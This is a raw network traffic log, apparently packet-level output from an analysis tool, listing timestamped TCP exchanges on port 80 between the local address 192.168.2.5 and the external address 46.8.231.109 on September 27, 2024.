Sep 27, 2024 00:15:06.462013960 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.462047100 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.462054014 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.462079048 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.462090015 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.462111950 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.462126970 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.462145090 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.462155104 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.462193966 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.462201118 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.462255001 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.462322950 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.462354898 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.462368965 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.462387085 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.462399006 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.462419033 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.462419987 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.462462902 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.462555885 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.462589979 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.462599993 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.462636948 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.462760925 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.462794065 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.462804079 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.462825060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.462837934 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.462857962 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.462876081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.462904930 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.462945938 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.462980032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.462990999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.463011980 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.463016987 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.463044882 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.463051081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.463076115 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.463083029 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.463108063 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.463114977 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.463139057 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.463145018 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.463171005 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.463177919 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.463202953 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.463208914 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.463236094 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.463243961 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.463268995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.463278055 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.463310003 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.463489056 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.463521004 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.463536978 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.463562012 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.544667006 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.544687986 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.544712067 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.544728994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.544743061 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.544755936 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.544771910 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.544899940 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.544914961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.544917107 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.544929981 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.544965982 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.544982910 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.545063972 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545078993 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545093060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545106888 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545109034 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.545130014 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.545156956 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.545180082 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545193911 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545207977 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545214891 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545222998 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.545228004 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545265913 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.545294046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545308113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545321941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545332909 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.545336962 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545351028 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545361996 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.545391083 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.545452118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545465946 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545479059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545491934 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545500040 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.545504093 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545516014 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.545547962 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.545615911 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545629978 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545643091 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545655966 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.545655966 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545670033 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545675039 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.545676947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545691013 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545695066 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.545706987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.545715094 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.545747042 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.546197891 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.546211004 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.546217918 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.546226025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.546237946 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.546251059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.546264887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.546273947 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.546283007 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.546312094 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.546328068 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.546659946 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.546674013 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.546688080 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.546710968 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.546736002 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.546770096 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.546783924 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.546797037 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.546811104 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.546809912 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.546828985 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.546854973 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.546945095 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.546957970 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.546972036 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.546986103 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.546993971 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.547000885 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.547010899 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.547015905 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.547048092 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.547606945 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.547653913 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.547705889 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.547719955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.547741890 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.547755957 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.547769070 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.547774076 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.547776937 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.547785044 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.547791958 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.547796965 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.547821045 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.547849894 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.547995090 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.548010111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.548024893 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.548039913 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.548057079 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.548074961 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.548091888 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.548105955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.548119068 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.548135042 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.548146963 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.548149109 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.548156977 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.548161983 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.548177958 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.548182964 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.548197985 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.548206091 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.548212051 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.548224926 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.548234940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.548238993 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.548250914 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.548276901 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.548294067 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.548887968 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.548902988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.548918009 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.548939943 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.548963070 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549001932 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549015999 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549029112 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549042940 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549043894 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549057961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549068928 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549097061 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549130917 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549149036 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549166918 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549171925 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549181938 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549197912 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549222946 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549237967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549253941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549268007 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549282074 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549293995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549299002 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549309969 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549320936 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549349070 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549485922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549499989 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549514055 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549526930 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549537897 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549540997 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549556017 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549565077 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549570084 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549582958 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549585104 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549599886 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549607038 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549616098 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549643040 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549666882 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549767017 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549779892 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549793959 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549808025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549810886 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549823046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549829960 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549837112 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549851894 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549859047 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549885035 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.549941063 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549957037 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.549982071 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.550004005 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.631477118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.631539106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.631557941 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.631568909 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.631592035 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.631612062 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.631639957 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.631673098 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.631686926 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.631716967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.631722927 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.631755114 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.631769896 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.631787062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.631800890 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.631833076 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.631834984 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.631869078 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.631886005 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.631915092 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.631916046 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.631948948 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.631966114 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.631982088 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.631999016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632015944 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632030010 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632047892 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632066965 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632102013 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632114887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632147074 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632164001 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632195950 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632211924 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632242918 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632262945 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632275105 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632288933 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632308006 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632323027 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632353067 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632356882 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632390022 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632407904 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632421970 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632433891 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632453918 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632464886 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632513046 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632517099 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632549047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632563114 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632581949 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632597923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632612944 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632622004 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632653952 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632661104 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632694006 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632714987 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632721901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632735014 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632756948 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632757902 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632790089 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632796049 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632819891 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632836103 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632852077 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632869005 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632884979 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632893085 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632916927 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632930994 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632947922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632960081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.632978916 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.632989883 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.633014917 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.633028984 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.633049965 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.633065939 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.633079052 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.633101940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.633111000 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.633121967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.633143902 CEST	80	49708	46.8.231.109	192.168.2.5
